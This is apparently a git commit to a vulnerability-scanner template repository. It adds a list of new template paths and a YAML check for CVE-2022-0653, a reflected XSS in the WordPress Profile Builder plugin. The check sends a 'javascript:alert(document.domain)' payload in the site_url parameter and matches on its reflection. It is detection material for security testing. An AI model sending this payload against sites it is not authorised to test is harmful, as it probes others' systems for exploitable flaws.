CVE-2022-0653 Wordpress Profile Builder – User Profile & User Registration Forms (#3761)

* Auto Generated New Template Addition List [Wed Feb 23 16:10:39 UTC 2022] 🤖

* Create CVE-2022-0653.yaml

* Auto Generated New Template Addition List [Wed Feb 23 16:13:51 UTC 2022] 🤖

* misc updates

* Auto Generated New Template Addition List [Thu Feb 24 11:29:05 UTC 2022] 🤖

Co-authored-by: GitHub Action <action@github.com>
Co-authored-by: sandeep <sandeep@projectdiscovery.io>

.new-additions

@@ -1,24 +1,169 @@
+cves/2009/CVE-2009-5020.yaml
+cves/2012/CVE-2012-4547.yaml
+cves/2013/CVE-2013-7091.yaml
+cves/2016/CVE-2016-10940.yaml
+cves/2016/CVE-2016-3978.yaml
+cves/2018/CVE-2018-1000226.yaml
+cves/2018/CVE-2018-18925.yaml
+cves/2018/CVE-2018-7602.yaml
 cves/2019/CVE-2019-1010290.yaml
+cves/2019/CVE-2019-10758.yaml
+cves/2019/CVE-2019-13396.yaml
+cves/2019/CVE-2019-3911.yaml
+cves/2019/CVE-2019-3912.yaml
+cves/2020/CVE-2020-12447.yaml
+cves/2020/CVE-2020-18268.yaml
+cves/2020/CVE-2020-24391.yaml
+cves/2020/CVE-2020-25864.yaml
+cves/2020/CVE-2020-35749.yaml
+cves/2020/CVE-2020-36365.yaml
+cves/2021/CVE-2021-20150.yaml
+cves/2021/CVE-2021-20158.yaml
+cves/2021/CVE-2021-20792.yaml
+cves/2021/CVE-2021-21973.yaml
+cves/2021/CVE-2021-24300.yaml
+cves/2021/CVE-2021-24488.yaml
+cves/2021/CVE-2021-24510.yaml
+cves/2021/CVE-2021-24750.yaml
+cves/2021/CVE-2021-24838.yaml
+cves/2021/CVE-2021-24926.yaml
+cves/2021/CVE-2021-24947.yaml
+cves/2021/CVE-2021-24991.yaml
+cves/2021/CVE-2021-25008.yaml
+cves/2021/CVE-2021-25028.yaml
+cves/2021/CVE-2021-25052.yaml
 cves/2021/CVE-2021-25063.yaml
+cves/2021/CVE-2021-25074.yaml
+cves/2021/CVE-2021-25864.yaml
+cves/2021/CVE-2021-26247.yaml
+cves/2021/CVE-2021-32682.yaml
+cves/2021/CVE-2021-32853.yaml
 cves/2021/CVE-2021-3293.yaml
+cves/2021/CVE-2021-34640.yaml
+cves/2021/CVE-2021-34643.yaml
+cves/2021/CVE-2021-39322.yaml
+cves/2021/CVE-2021-39350.yaml
+cves/2021/CVE-2021-39433.yaml
+cves/2021/CVE-2021-40323.yaml
 cves/2021/CVE-2021-43062.yaml
+cves/2021/CVE-2021-43810.yaml
+cves/2021/CVE-2021-45380.yaml
+cves/2021/CVE-2021-46005.yaml
 cves/2022/CVE-2022-0149.yaml
+cves/2022/CVE-2022-0218.yaml
+cves/2022/CVE-2022-0281.yaml
+cves/2022/CVE-2022-0378.yaml
+cves/2022/CVE-2022-0432.yaml
+cves/2022/CVE-2022-0653.yaml
+cves/2022/CVE-2022-23178.yaml
+cves/2022/CVE-2022-23808.yaml
+cves/2022/CVE-2022-23944.yaml
 cves/2022/CVE-2022-24112.yaml
 cves/2022/CVE-2022-25323.yaml
+default-logins/cobbler/cobbler-default-login.yaml
+default-logins/gophish/gophish-default-login.yaml
+default-logins/huawei/huawei-HG532e-default-router-login.yaml
+default-logins/jboss/jmx-default-login.yaml
+default-logins/mofi/mofi4500-default-login.yaml
+default-logins/netsus/netsus-default-login.yaml
+default-logins/versa/versa-default-login.yaml
+default-logins/xerox/xerox7-default-login.yaml
+exposed-panels/alfresco-detect.yaml
+exposed-panels/atvise-login.yaml
+exposed-panels/bigbluebutton-login.yaml
+exposed-panels/cisco/cisco-ucs-kvm-login.yaml
+exposed-panels/cobbler-webgui.yaml
+exposed-panels/code42-panel.yaml
+exposed-panels/concrete5/concrete5-install.yaml
+exposed-panels/concrete5/concrete5-panel.yaml
+exposed-panels/ecosys-command-center.yaml
+exposed-panels/flightpath-panel.yaml
+exposed-panels/gophish-login.yaml
+exposed-panels/hashicorp-consul-agent.yaml
+exposed-panels/hashicorp-consul-webgui.yaml
+exposed-panels/jamf-panel.yaml
+exposed-panels/netdata-dashboard-detected.yaml
+exposed-panels/netsus-server-login.yaml
+exposed-panels/openbmcs-detect.yaml
 exposed-panels/otobo-panel.yaml
+exposed-panels/projectsend-login.yaml
 exposed-panels/pypicloud-panel.yaml
+exposed-panels/qualcomm-voip-router.yaml
+exposed-panels/seeddms-panel.yaml
+exposed-panels/strapi-documentation.yaml
+exposed-panels/submitty-login.yaml
+exposed-panels/teltonika-login.yaml
+exposed-panels/terraform-enterprise-panel.yaml
+exposed-panels/threatq-login.yaml
+exposed-panels/trendnet/trendnet-tew827dru-login.yaml
+exposed-panels/typo3-login.yaml
 exposed-panels/unauth-xproxy-dashboard.yaml
+exposed-panels/versa-sdwan.yaml
+exposed-panels/voipmonitor-panel.yaml
+exposed-panels/wallix-accessmanager-panel.yaml
+exposed-panels/wazuh-panel.yaml
+exposed-panels/webmodule-ee-panel.yaml
+exposed-panels/xxljob-panel.yaml
+exposed-panels/zblogphp-panel.yaml
+misconfiguration/caddy-open-redirect.yaml
+misconfiguration/cobbler-exposed-directory.yaml
+misconfiguration/misconfigured-concrete5.yaml
+misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml
+misconfiguration/openbmcs/openbmcs-ssrf.yaml
+ssl/deprecated-tls.yaml
+takeovers/gitbook-takeover.yaml
 takeovers/short-io.yaml
+technologies/airtame-device-detect.yaml
+technologies/apollo-server-detect.yaml
+technologies/appcms-detect.yaml
+technologies/cobbler-version.yaml
+technologies/erxes-detect.yaml
+technologies/gnuboard-detect.yaml
+technologies/interactsh-server.yaml
+technologies/lexmark-detect.yaml
+technologies/metatag-cms.yaml
+technologies/projectsend-detect.yaml
 technologies/roundcube-webmail-portal.yaml
+technologies/smartstore-detect.yaml
+technologies/typo3-detect.yaml
 technologies/web-suite-detect.yaml
 technologies/zerof-webserver-detect.yaml
+vulnerabilities/gitlab/gitlab-rce.yaml
+vulnerabilities/jamf/jamf-blind-xxe.yaml
+vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml
+vulnerabilities/joomla/rusty-joomla.yaml
+vulnerabilities/laravel/laravel-ignition-xss.yaml
+vulnerabilities/other/antsword-backdoor.yaml
 vulnerabilities/other/goip-1-lfi.yaml
+vulnerabilities/other/java-melody-xss.yaml
+vulnerabilities/other/kyocera-m2035dn-lfi.yaml
 vulnerabilities/other/otobo-open-redirect.yaml
 vulnerabilities/other/pollbot-redirect.yaml
+vulnerabilities/other/yishaadmin-lfi.yaml
+vulnerabilities/ransomware/deadbolt-ransomware.yaml
 vulnerabilities/wordpress/accessibility-helper-xss.yaml
+vulnerabilities/wordpress/candidate-application-lfi.yaml
+vulnerabilities/wordpress/cherry-lfi.yaml
+vulnerabilities/wordpress/churchope-lfi.yaml
+vulnerabilities/wordpress/db-backup-lfi.yaml
 vulnerabilities/wordpress/easy-social-feed.yaml
+vulnerabilities/wordpress/elementorpage-open-redirect.yaml
 vulnerabilities/wordpress/elex-woocommerce-xss.yaml
 vulnerabilities/wordpress/feedwordpress-xss.yaml
+vulnerabilities/wordpress/hb-audio-lfi.yaml
+vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml
 vulnerabilities/wordpress/mthemeunus-lfi.yaml
+vulnerabilities/wordpress/music-store-open-redirect.yaml
 vulnerabilities/wordpress/my-chatbot-xss.yaml
+vulnerabilities/wordpress/newsletter-open-redirect.yaml
+vulnerabilities/wordpress/ninjaform-open-redirect.yaml
+vulnerabilities/wordpress/noptin-open-redirect.yaml
+vulnerabilities/wordpress/shortcode-lfi.yaml
+vulnerabilities/wordpress/simple-image-manipulator-lfi.yaml
+vulnerabilities/wordpress/sniplets-lfi.yaml
+vulnerabilities/wordpress/sniplets-xss.yaml
+vulnerabilities/wordpress/wp-code-snippets-xss.yaml
+vulnerabilities/wordpress/wp-spot-premium-lfi.yaml
 vulnerabilities/wordpress/wp-whmcs-xss.yaml
+workflows/concrete-workflow.yaml
+workflows/gophish-workflow.yaml

cves/2022/CVE-2022-0653.yaml

@@ -0,0 +1,30 @@
+id: CVE-2022-0653
+
+info:
+  name: Wordpress Profile Builder Plugin XSS
+  author: dhiyaneshDk
+  severity: medium
+  reference:
+    - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
+  tags: cve,cve2022,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<a href="javascript:alert(document.domain);">here</a>'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200